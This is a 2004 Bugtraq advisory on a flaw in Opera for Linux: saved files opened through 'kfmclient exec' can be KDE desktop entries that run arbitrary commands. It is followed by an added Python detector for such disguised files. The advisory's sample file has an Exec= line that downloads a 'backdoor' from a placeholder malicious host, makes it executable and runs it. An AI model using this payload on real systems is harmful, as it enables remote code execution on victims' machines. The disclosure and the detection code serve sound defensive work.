Bugtraq mailing list archives
[ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclien
From: "Giovanni Delvecchio" <badpenguin79 () hotmail com>
Date: Mon, 13 Dec 2004 13:49:23 +0000
Author: Giovanni Delvecchio
e-mail: badpenguin () zone-h org
Original Advisory: http://www.zone-h.org/advisories/read/id=6503
Tested version: Opera 7.54 linux version with Kde 3.2.3

Problem:
=======
Opera for linux uses "kfmclient exec" as "Default Application" to handle saved files. This could be used by malicious remote users to execute arbitrary shell commands on a target system. Indeed, the command "kfmclient exec" can be used to open a "KDE Desktop Entry" and therefore execute the command given in its "Exec=" entry.
Example of [KDE Desktop Entry]:
________________________________
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________

Possible method of Exploitation
=========================
This method of exploitation requires that a particular file name extension is used. If page.Htm is used as the file name and "kfmclient exec page.Htm" is run, the command in the "Exec=" entry will be executed. Instead, if "page.htm" is used as the file name, it will not be opened as a "KDE desktop entry" but will be viewed in Konqueror.
It also works with Jpg, Gif etc., but not with the jpg, gif extensions, since the "system" is case sensitive.

Attack scenario:
1- A user clicks on a link which requests http://malicious_server/image.Jpg
2- malicious_server responds with an unknown Content-Type field, for example "Content-Type: image/Jpeg." (note the dot at the end), so Opera will show a dialog window.
3- If the user chooses "Open" to view image.Jpg, it will be opened by the "kfmclient exec" command, since kfmclient is the "Default Application".
4- image.Jpg is a KDE desktop entry:
--------image.Jpg----------
# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
---- end of image.Jpg-------
Note: \t is a horizontal tab. In this case a backdoor will be downloaded to the victim's computer and executed.
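As an added example (not part of the advisory), a small Python check in the spirit of the attack scenario above: it compares a saved download's extension with its content and flags a KDE desktop entry carrying an Exec= line under an image or HTML extension, and separately flags the mixed-case extension trick (Jpg vs jpg). The extension list, the header pattern and the sample files are constructed assumptions.

```python
import re
from pathlib import PurePosixPath

# Extensions the advisory shows Opera handing to "kfmclient exec" (assumed list).
DATA_EXTENSIONS = {"jpg", "jpeg", "gif", "png", "htm", "html"}
# Header and Exec= line of a KDE desktop entry (either spelling of the header).
DESKTOP_HEADER = re.compile(rb"^\s*\[(KDE )?Desktop Entry\]\s*$", re.M)
EXEC_LINE = re.compile(rb"^\s*Exec\s*=(.*)$", re.M)

def inspect_download(name: str, data: bytes) -> dict:
    """Classify a saved download by comparing its extension with its content.

    verdict: 'block'      -> desktop entry with an Exec= command under a data extension
             'suspicious' -> mixed-case data extension (the Jpg/jpg trick), no desktop entry
             'ok'         -> nothing matching this advisory's pattern
    """
    ext = PurePosixPath(name).suffix.lstrip(".")
    mixed_case = ext != ext.lower()
    is_desktop = DESKTOP_HEADER.search(data) is not None
    exec_cmd = None
    if is_desktop:
        m = EXEC_LINE.search(data)
        if m:
            # The advisory separates words with tabs; show the command as the shell sees it.
            exec_cmd = m.group(1).decode("utf-8", "replace").replace("\t", " ").strip()
    if is_desktop and exec_cmd and ext.lower() in DATA_EXTENSIONS:
        verdict = "block"
    elif mixed_case and ext.lower() in DATA_EXTENSIONS:
        verdict = "suspicious"
    else:
        verdict = "ok"
    return {"name": name, "ext": ext, "mixed_case_ext": mixed_case,
            "desktop_entry": is_desktop, "exec_command": exec_cmd, "verdict": verdict}

# Constructed sample modelled on the advisory's image.Jpg, with a harmless Exec= line.
SAMPLE_DESKTOP = (b"# KDE Config File\n[KDE Desktop Entry]\nSwallowExec=\nMimeType=\n"
                  b"Exec=/bin/echo\tPLACEHOLDER_COMMAND\nType=Application\nTerminal=0\n")
# Constructed minimal JPEG header for the benign case.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16

if __name__ == "__main__":
    for fname, blob in [("image.Jpg", SAMPLE_DESKTOP), ("image.Jpg", SAMPLE_JPEG),
                        ("image.jpg", SAMPLE_JPEG)]:
        r = inspect_download(fname, blob)
        print(f"{fname}: {r['verdict']} exec={r['exec_command']!r}")
```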
Solution:
========
Disable "kfmclient exec" as default application.